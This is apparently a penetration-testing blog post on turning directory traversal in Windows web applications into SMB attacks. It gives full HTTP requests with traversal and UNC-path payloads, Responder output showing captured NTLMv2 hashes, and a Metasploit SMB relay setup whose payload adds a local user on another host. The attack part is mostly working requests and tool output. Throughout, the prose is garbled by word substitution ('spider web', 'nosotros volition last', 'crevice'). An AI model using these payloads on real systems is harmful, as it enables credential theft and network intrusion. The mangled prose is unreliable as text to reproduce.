Smb Attacks Through Directory Traversal

For some argue I've late come across a number of spider web applications that allow for either directory traversal or filename manipulation attacks. These issues are typically used to reveal spider web server specific files as well as sensitive data files (web.config, salaryreport.pdf, etc.) and/or operating organisation files (SYSTEM, SAM, etc.)
Here's what a typical vulnerable asking looks like:

GET /Print/FileReader.aspx?Id=report1.pdf&Type=pdf HTTP/1.1 Host: example.com Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf; 

Note the Id parameter inward the URL. This is the vulnerable parameter that nosotros volition last attacking. We could easily alter report1.pdf to whatever other file inward the spider web directory (report2.pdf, web.config, etc.), but nosotros tin likewise plow our assault against the operating system.
Here's an event asking for the win.ini file from the spider web server:

GET /Print/FileReader.aspx?Id=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini&Type=pdf HTTP/1.1 Host: example.com Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf; 

This is a to a greater extent than traditional directory traversal attack. We're moving upwards several directories hence that nosotros tin larn dorsum into the Windows directory. Directory traversal attacks bring been but about for a long time, hence this may last a pretty familiar concept. Now that nosotros bring the basic concepts out of the way, let's consider how nosotros tin leverage it against internally deployed spider web applications.
Internally deployed spider web applications tin allow for a much wider assault surface area (RDP, SMB, etc.) against the spider web server. This likewise makes directory traversal as well as file specification attacks to a greater extent than interesting. Instead of but accessing arbitrary files on the system, why don't nosotros endeavour as well as access other systems inward the environment.
In club to pin this assault to other systems on the network, nosotros volition last utilizing UNC file paths to capture and/or relay SMB credentials. As a indicate of clarification, the next examples are against spider web servers that are running on Windows. Following our previous examples, nosotros volition last using a UNC path to our attacking host, instead of report1.pdf for the parameter.
Here's an event request:

GET /Print/FileReader.aspx?Id=\\192.168.1.123\test.pdf&Type=pdf HTTP/1.1 Host: example.com Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf; 

This volition forcefulness the spider web server to await for test.pdf at 192.168.1.123. This volition allow us to capture as well as crevice the network hashes for the describe organisation human relationship running the spider web server service. Here's an event of how nosotros would usage Responder.py to do the SMB capture:

python Responder.py -i 192.168.1.123 NBT Name Service/LLMNR Answerer 1.0. Please post bugs/comments to: lgaffie@trustwave.com To kill this script hitting CRTL-C [+]NBT-NS & LLMNR responder started [+]Loading Responder.conf File.. Global Parameters set: Responder is jump to this interface:eth0 Challenge gear upwards is: 1122334455667788 WPAD Proxy Server is:OFF WPAD script loaded:function FindProxyForURL(url, host){return 'PROXY ISAProxySrv:3141; DIRECT';} HTTP Server is:ON HTTPS Server is:ON SMB Server is:ON SMB LM back upwards is gear upwards to:OFF SQL Server is:ON FTP Server is:ON DNS Server is:ON LDAP Server is:ON FingerPrint Module is:OFF Serving Executable via HTTP&WPAD is:OFF Always Serving a Specific File via HTTP&WPAD is:OFF  [+]SMB-NTLMv2 hash captured from :  192.168.1.122 Domain is : EXAMPLE User is : webserverservice [+]SMB consummate hash is : webserverservice::EXAMPLE:1122334455667788: 58D4DB26036DE56CB49237BFB9E418F8:01010000000000002A5FB1391FFCCE010F06DF8E6FE85EB20000000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E006C006F00630061006C000500160073006D006200310032002E006C006F00630061006C000800300030000000000000000000000000300000620DD0B514EA55632219A4B83D1D6AAA07659ABA3A4BB54577C7AEEB871A88B90A001000000000000000000000000000000000000900260063006900660073002F00310030002E003100300030002E003100300030002E003100330036000000000000000000 Share requested: \\192.168.1.123IPC$  [+]SMB-NTLMv2 hash captured from :  192.168.1.122 Domain is : EXAMPLE User is : webserverservice [+]SMB consummate hash is : webserverservice::EXAMPLE:1122334455667788: 57A39519B09AA3F4B6EE7B385CFB624C:01010000000000001A98853A1FFCCE0166E7A590D6DF976B0000000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E006C006F00630061006C000500160073006D006200310032002E006C006F00630061006C000800300030000000000000000000000000300000620DD0B514EA55632219A4B83D1D6AAA07659ABA3A4BB54577C7AEEB871A88B90A001000000000000000000000000000000000000900260063006900660073002F00310030002E003100300030002E003100300030002E003100330036000000000000000000 Share requested: \\192.168.1.123test.pdf 

Once we've captured the credentials, nosotros tin endeavour to crevice them amongst oclHashcat. If the server responds amongst LM hashes, you lot tin usage rainbow tables to speed things up. Once cracked, nosotros tin consider where these credentials bring access.
Let's pretend that nosotros are non able to crevice the hash for the spider web server account. We tin likewise endeavour to relay these credentials to some other host on the internal network (192.168.1.124) that the describe organisation human relationship may bring access to. This tin last done amongst the SMB Relay module inside Metasploit as well as Responder late added back upwards for SMB relay. In the event below, nosotros volition usage the Metasploit module to add together a local user to the target server (192.168.1.124). The typical usage/payload for the module is to larn a Meterpreter crunch on the target system.

Module options (exploit/windows/smb/smb_relay): Name        Current Setting  Required  Description ----        ---------------  --------  ----------- SHARE       ADMIN$           yes       The portion to connect to SMBHOST     192.168.1.124    no        The target SMB server SRVHOST     192.168.1.123    yes       The local host to hear on. SRVPORT     445              yes       The local port to hear on. SSL         false            no        Negotiate SSL for incoming connections SSLCert                      no        Path to a custom SSL certificate SSLVersion  SSL3             no        Specify the version of SSL that should last used   Payload options (windows/adduser): Name      Current Setting  Required  Description ----      ---------------  --------  ----------- CUSTOM                     no        Custom grouping advert to last used instead of default EXITFUNC  thread           yes       Exit technique: seh, thread, process, none PASS      Password123!     yes       The password for this user USER      netspi           yes       The username to create WMIC      false            yes       Use WMIC on the target to resolve administrators grouping  Exploit running as background job.  Server started. <------------Truncated------------> Received 192.168.1.122:21251 EXAMPLEwebserverservice LMHASH:b2--Truncated--03 NTHASH:46-- Truncated --00 OS: LM: Authenticating to 192.168.1.124 as EXAMPLEwebserverservice... AUTHENTICATED as EXAMPLEwebserverservice... Connecting to the defined share... Regenerating the payload... Uploading payload... Created OemWSPRa.exe... Connecting to the Service Control Manager... Obtaining a service manager handle... Creating a new service... Closing service handle... Opening service... Starting the service... Removing the service... Closing service handle... Deleting OemWSPRa.exe... Sending Access Denied to 192.168.1.122:21251 EXAMPLEwebserverservice 

This may non last mind-blowing novel information, but hopefully this gives you lot some practiced ideas on other ways to utilize directory traversal vulnerabilities.